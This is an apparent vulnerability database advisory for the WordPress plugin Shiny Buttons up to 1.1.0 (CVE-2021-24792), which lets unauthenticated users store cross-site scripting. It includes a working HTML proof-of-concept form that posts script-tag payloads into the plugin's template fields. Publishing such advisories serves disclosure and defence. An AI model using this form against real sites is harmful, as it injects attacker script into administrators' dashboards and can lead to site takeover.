WordPress Plugin Vulnerabilities

Shiny Buttons <= 1.1.0 - Unauthenticated Stored Cross-Site Scripting

Description

The plugin does not have any authorisation and CSRF in place when saving a template (wpbtn_save_template function hooked to the init action), nor sanitise and escape them before outputting them in the admin dashboard, which allow unauthenticated users to add a malicious template and lead to Stored Cross-Site Scripting issues.

Proof of Concept

<html>
  <body>
    <form action="https://example.com/" method="POST">
      <input type="hidden" name="wpbtn_tpl[id]" value="<script>alert(/XSS-id/)</script>" />
      <input type="hidden" name="wpbtn_tpl[name]" value="<script>alert(/XSS-name/)</script>" />
      <input type="hidden" name="wpbtn_tpl[bg_css]" value="background: #6d0019;background: -moz-linear-gradient(top, #6d0019 0%, #a90329 74%);background: -webkit-gradient(linear, left top, left bottom, color-stop(0%,#6d0019), color-stop(74%,#a90329));background: -webkit-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -o-linear-gradient(top, #6d0019 0%,#a90329 74%);background: -ms-linear-gradient(top, #6d0019 0%,#a90329 74%);filter: progid:DXImageTransform.Microsoft.gradient( startColorstr='#6d0019', endColorstr='#a90329',GradientType=0 );background: linear-gradient(top, #6d0019 0%,#a90329 74%);" />
      <input type="hidden" name="wpbtn_tpl[text_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[font]" value="Michroma" />
      <input type="hidden" name="wpbtn_tpl[font_size]" value="12" />
      <input type="hidden" name="wpbtn_tpl[font_weight]" value="normal" />
      <input type="hidden" name="wpbtn_tpl[border_color]" value="ffffff" />
      <input type="hidden" name="wpbtn_tpl[radius]" value="0" />
      <input type="hidden" name="wpbtn_tpl[width]" value="0" />
      <input type="hidden" name="do" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

Affects Plugins

Plugin icon
shiny-buttons
No known fix

References

CVE
CVE-2021-24792

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.8 (high)

Miscellaneous

Original Researcher
Vishal Mohan
Submitter
Vishal Mohan
Submitter twitter
Vishal12MI
Verified
Yes
WPVDB ID
29514d8e-9d1c-4fb6-b378-f6b7374989ca

Timeline

Publicly Published
2021-11-15 (about 2 years ago)
Added
2021-11-15 (about 2 years ago)
Last Updated
2022-04-11 (about 2 years ago)

Other

Published
Title
Published
2014-12-01
Title
Wordfence 5.2.2 - XSS in Referer Header
Published
2023-01-16
Title
Contextual Related Posts < 3.3.1 - Contributor+ Stored XSS
Published
2022-12-22
Title
Real Testimonials < 2.6.0 - Contributor+ Stored XSS
Published
2015-07-08
Title
YOP Poll <= 5.7.3 - Reflected Cross-Site Scripting (XSS)
Published
2023-02-20
Title
Circles Gallery <= 1.0.10 - Admin+ Stored XSS